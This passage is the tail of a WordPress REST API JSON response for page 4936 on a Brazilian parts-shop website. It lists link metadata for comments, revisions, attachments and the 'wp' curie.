mments?post=4936"}],"version-history":[{"count":0,"href":"https:\/\/borghettipecas.com.br\/es\/wp-json\/wp\/v2\/pages\/4936\/revisions"}],"wp:attachment":[{"href":"https:\/\/borghettipecas.com.br\/es\/wp-json\/wp\/v2\/media?parent=4936"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}